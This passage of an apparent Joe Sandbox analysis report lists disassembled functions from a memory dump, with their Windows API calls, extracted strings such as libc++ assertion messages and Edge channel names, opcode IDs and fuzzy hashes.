                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction ID: 08eeba83fa58e4b1064c3e79b91978aa136107131c24f0ec9c243fc9cdfa13cb
                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction Fuzzy Hash: FE113AB764418283D6198A3DD8B86F7A795EFD532072C437AF0428B758D223EB45A630
                                                  Function 00CC614D Relevance: .1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 51f477ecbd8c86e18464dd12c1106ff108f6fe7e53e3396059e243e6e9527724
                                                  • Instruction ID: 3e4aa2ddb2d8e81c8354a7a9abd9c0855dd406e35942f766b766150b3b172115
                                                  • Opcode Fuzzy Hash: 51f477ecbd8c86e18464dd12c1106ff108f6fe7e53e3396059e243e6e9527724
                                                  • Instruction Fuzzy Hash: DD1151D9C2AF7A06E713633B5D42242DA105EF7989550D347FCB439D61F701B5C17210
                                                  Function 00CC626D Relevance: .0, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d35fea1031711773cf9ca4232a4cd6f839659ec201a35b62fd392b4a4f0e2cbd
                                                  • Instruction ID: 7b954fd7434b16f392998e7452f15770c1e012c64c0d35b07d88df37a7d881fe
                                                  • Opcode Fuzzy Hash: d35fea1031711773cf9ca4232a4cd6f839659ec201a35b62fd392b4a4f0e2cbd
                                                  • Instruction Fuzzy Hash: CB014FDAC24FAA45E313A33D6843282E6109FF7548620E347FCF838E62F70176D46220
                                                  Function 00CC4577 Relevance: .0, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b478e1f546ce9a5c90263f502841de5ed2815c13aa0d6343b5217c81eca3c23b
                                                  • Instruction ID: 1fabfd0888d374e86364dcda8c30c5f4c4e21c3eaf28e8fadd05bfcc9b9cf0af
                                                  • Opcode Fuzzy Hash: b478e1f546ce9a5c90263f502841de5ed2815c13aa0d6343b5217c81eca3c23b
                                                  • Instruction Fuzzy Hash: EBE012305183418FC746DF20C190866FBF1EF87311B06E689D4599B566D335EE89CB55
                                                  Function 00D57A70 Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 233COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: _strlen
                                                  • String ID: "-Infinity"$"0x%llx"$"Infinity"$"NaN"$"Unsupported (crbug.com/1225176)"$%lld$%llu$-Infinity$0x%llx$Infinity$NULL$NaN$false$true
                                                  • API String ID: 4218353326-265266769
                                                  • Opcode ID: e5114e2a2d25b4635ad128f20640914fb37ba55e07b04a464a17cf1643e31198
                                                  • Instruction ID: cec4f617a72c965ecdabf0c3189aa84fade8da24f16f0ffdf5ce13e92e0537ea
                                                  • Opcode Fuzzy Hash: e5114e2a2d25b4635ad128f20640914fb37ba55e07b04a464a17cf1643e31198
                                                  • Instruction Fuzzy Hash: AB71587160C340ABEF119F20E841BBB7BA1EF86351F348519FC955A291EB31C98D9772
                                                  Function 00D41010 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 189COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: _strlen
                                                  • String ID: MSEdgeBeta$MSEdgeCanary$MSEdgeDev$MSEdgeInternal$MSEdgeWebView$Microsoft.MSEdgeBeta$Microsoft.MSEdgeCanary$Microsoft.MSEdgeDev$Microsoft.MSEdgeInternal$Microsoft.MSEdgeStable$Microsoft.MSEdgeWebView
                                                  • API String ID: 4218353326-4251218085
                                                  • Opcode ID: fb2fe6f779d75f6b9598c554488c581493599958068297a52a0ef162b13f0e06
                                                  • Instruction ID: 95b6d0fd02726772487f7fc847534f7fad082f5b3eef849addb40783597a70ef
                                                  • Opcode Fuzzy Hash: fb2fe6f779d75f6b9598c554488c581493599958068297a52a0ef162b13f0e06
                                                  • Instruction Fuzzy Hash: CA6185B5E40304AFDB00DF54DC42FEE76E5AF48704F184129F906AA291EAB1DA49C7B5
                                                  Function 00D20660 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 248COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _strlen.LIBCMT ref: 00D206C7
                                                  • _strlen.LIBCMT ref: 00D20715
                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00D20808
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00D20812
                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,00D232B0,00D23340,00D23300,?,?,?,?,?,?,?,?,?), ref: 00D20870
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D2087A
                                                  Strings
                                                  • ..\..\base\trace_event\trace_log.cc, xrefs: 00D20900
                                                  • node shouldn't be null, xrefs: 00D2094E
                                                  • SetDisabledWhileLocked, xrefs: 00D20905
                                                  • __x != nullptr, xrefs: 00D20953
                                                  • ..\..\buildtools\third_party\libc++\trunk\include\__tree, xrefs: 00D2095D
                                                  • %s:%d: assertion %s failed: %s, xrefs: 00D20962
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$AcquireRelease_strlen
                                                  • String ID: %s:%d: assertion %s failed: %s$..\..\base\trace_event\trace_log.cc$..\..\buildtools\third_party\libc++\trunk\include\__tree$SetDisabledWhileLocked$__x != nullptr$node shouldn't be null
                                                  • API String ID: 1083709183-3419696668
                                                  • Opcode ID: c2b30a1befb552d3d9c980627d1156a25ea01c3ad4dfb249bcca970ad21247d5
                                                  • Instruction ID: 8664983655f64e4d81e43882337765c9a720f9acfb889b370c4f601215f1f61e
                                                  • Opcode Fuzzy Hash: c2b30a1befb552d3d9c980627d1156a25ea01c3ad4dfb249bcca970ad21247d5
                                                  • Instruction Fuzzy Hash: 1B91A571E002249FDB14DF64E885ABEBBB4EF68318F084129E906A7342D770AD45CBF1
                                                  Function 00D26F80 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 104threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentThread.KERNEL32 ref: 00D26FAF
                                                  • SetThreadPriority.KERNEL32(00000000,00020000,?,000000CF,?), ref: 00D26FCC
                                                  • GetCurrentThread.KERNEL32 ref: 00D2709C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Priority
                                                  • String ID: SetThreadInformation$kernel32.dll
                                                  • API String ID: 3341643625-3009701951
                                                  • Opcode ID: e1f3e8b6b24f3130d6224734a4944154d812abc2b7ebadc3d6a7636fbfddab92
                                                  • Instruction ID: 6a1970b819363c5e13b5660b35fbec88d251179a35e27a593dc5c0d34d8a212a
                                                  • Opcode Fuzzy Hash: e1f3e8b6b24f3130d6224734a4944154d812abc2b7ebadc3d6a7636fbfddab92
                                                  • Instruction Fuzzy Hash: BF310731904325DFCB209B24FE49DAE3B74EB65328B58061AF512D7391DBB4D9848BB1
                                                  Function 00D562A0 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 232COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualFree.KERNEL32(00000000,00000002,00004000,?,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?,?,?,000C7D80,000C7DC0,?), ref: 00D562D3
                                                  • TryAcquireSRWLockExclusive.KERNEL32(00DD308C,00000001,?,?,?,00D2784E), ref: 00D5630B
                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,00D2784E), ref: 00D56337
                                                  • ReleaseSRWLockExclusive.KERNEL32(00DD308C,?,?,?,00D2784E), ref: 00D56366
                                                  Strings
                                                  • !empty(), xrefs: 00D566B2
                                                  • back() called on an empty vector, xrefs: 00D566AD
                                                  • __location != nullptr, xrefs: 00D566C8
                                                  • ..\..\buildtools\third_party\libc++\trunk\include\__memory\construct_at.h, xrefs: 00D566CF
                                                  • ..\..\buildtools\third_party\libc++\trunk\include\vector, xrefs: 00D566BC
                                                  • %s:%d: assertion %s failed: %s, xrefs: 00D566D4
                                                  • null pointer given to construct_at, xrefs: 00D566C3
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveFreeLockVirtual$AcquireRelease
                                                  • String ID: !empty()$%s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\__memory\construct_at.h$..\..\buildtools\third_party\libc++\trunk\include\vector$__location != nullptr$back() called on an empty vector$null pointer given to construct_at
                                                  • API String ID: 448536242-751371438
                                                  • Opcode ID: 3da34ee3da55c81c7e57e31124336a2e556832c08a6f01c27f266e254f5188e3
                                                  • Instruction ID: f886b95bffd1bca88f262ee00c756b1ec112a9ad1f43f1b226a87159239084d6
                                                  • Opcode Fuzzy Hash: 3da34ee3da55c81c7e57e31124336a2e556832c08a6f01c27f266e254f5188e3
                                                  • Instruction Fuzzy Hash: 5E71E271604304DBDB109F64D881A6AB3E4FF88711F544A2EFED6D7680E770E9088BB5
                                                  Function 00D33F00 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 174fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32 ref: 00D33F69
                                                  • GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 00D33FAC
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00D3401C
                                                  • CreateFileW.KERNEL32 ref: 00D3411A
                                                  Strings
                                                  • !empty(), xrefs: 00D3417E
                                                  • debug.log, xrefs: 00D340E1, 00D3414C
                                                  • string::back(): string is empty, xrefs: 00D34179
                                                  • __s should never be greater than or equal to the short string capacity, xrefs: 00D3418A
                                                  • ..\..\buildtools\third_party\libc++\trunk\include\string, xrefs: 00D34199
                                                  • __s < __min_cap, xrefs: 00D3418F
                                                  • %s:%d: assertion %s failed: %s, xrefs: 00D3419E
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: File$Create$CurrentDirectoryModuleName
                                                  • String ID: !empty()$%s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\string$__s < __min_cap$__s should never be greater than or equal to the short string capacity$debug.log$string::back(): string is empty
                                                  • API String ID: 4120427848-116757326
                                                  • Opcode ID: 6470c99c1cf53caa290fddfa2121ee51eefa554375cc6ea017feb1fb672aaf98
                                                  • Instruction ID: c9daceb365102dd0f648769b5788fa6dedb8ebbc06336aa7eba20bfbf5ef25c5
                                                  • Opcode Fuzzy Hash: 6470c99c1cf53caa290fddfa2121ee51eefa554375cc6ea017feb1fb672aaf98
                                                  • Instruction Fuzzy Hash: D9513630700B42CBD7209F24DC49B6A7BA1BF91714F04866CE5969B3E5DBB8B4C887B1
                                                  Function 00D3C890 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 00D3C8CE
                                                  • IsWow64Process.KERNEL32(00000000,00000000), ref: 00D3C8DA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: Process$CurrentWow64
                                                  • String ID: allo$c$comm$is_w$it$ize$ow_6$size$va_s
                                                  • API String ID: 1905925150-1478685300
                                                  • Opcode ID: 264d83d279eef2ca2a0166e1e5627dcc4c9d3f858eacd1c7119219fac67ee5bb
                                                  • Instruction ID: 43f4027d6c9b012201d485559fed233cf9a2deb19b65296e412bc91476f77318
                                                  • Opcode Fuzzy Hash: 264d83d279eef2ca2a0166e1e5627dcc4c9d3f858eacd1c7119219fac67ee5bb
                                                  • Instruction Fuzzy Hash: 9A314AB19083409FD704DF65D88979BBBF8BB89304F454A2DF98987301D7B5E6088BA7
                                                  Function 00D34600 Relevance: 18.0, APIs: 7, Strings: 3, Instructions: 451fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _strrchr.LIBCMT ref: 00D34844
                                                  • OutputDebugStringA.KERNEL32(FFFFFFFF,?,?), ref: 00D3494C
                                                  • WriteFile.KERNEL32(FFFFFFFF,FFFFFFFF,FFFFFFFF,00000000,?,?), ref: 00D349FD
                                                  • _strlen.LIBCMT ref: 00D34B1C
                                                  • __Init_thread_header.LIBCMT ref: 00D34C5B
                                                    • Part of subcall function 00D61817: EnterCriticalSection.KERNEL32(00DC3F80,?,?,?,00D45339,00DD0648,00000000,?,?,?,?,00D450B7,00000000,00000000), ref: 00D61822
                                                    • Part of subcall function 00D61817: LeaveCriticalSection.KERNEL32(00DC3F80,?,?,?,00D45339,00DD0648,00000000,?,?,?,?,00D450B7,00000000,00000000), ref: 00D6185F
                                                  • __Init_thread_header.LIBCMT ref: 00D34C9E
                                                  • __Init_thread_header.LIBCMT ref: 00D34CD4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: Init_thread_header$CriticalSection$DebugEnterFileLeaveOutputStringWrite_strlen_strrchr
                                                  • String ID: %s:%d: %s$LOG_FATAL$LogMessage
                                                  • API String ID: 2690736268-1864124823
                                                  • Opcode ID: 62beffd7c783d59b1fd86a3c00658565d1a1b14f24aaec544f374019f1f49c7c
                                                  • Instruction ID: 1a89c61f584abfa7a18e3a1b521c0cf6ad15f91a2d0f61f400f18499f1acea57
                                                  • Opcode Fuzzy Hash: 62beffd7c783d59b1fd86a3c00658565d1a1b14f24aaec544f374019f1f49c7c
                                                  • Instruction Fuzzy Hash: 4B02BFB1A003298FDB20DB24DC81BAAB7B5AB45314F4841E9E609A3351DB74BEC5CF75
                                                  Function 00D255F0 Relevance: 17.8, APIs: 4, Strings: 6, Instructions: 251libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
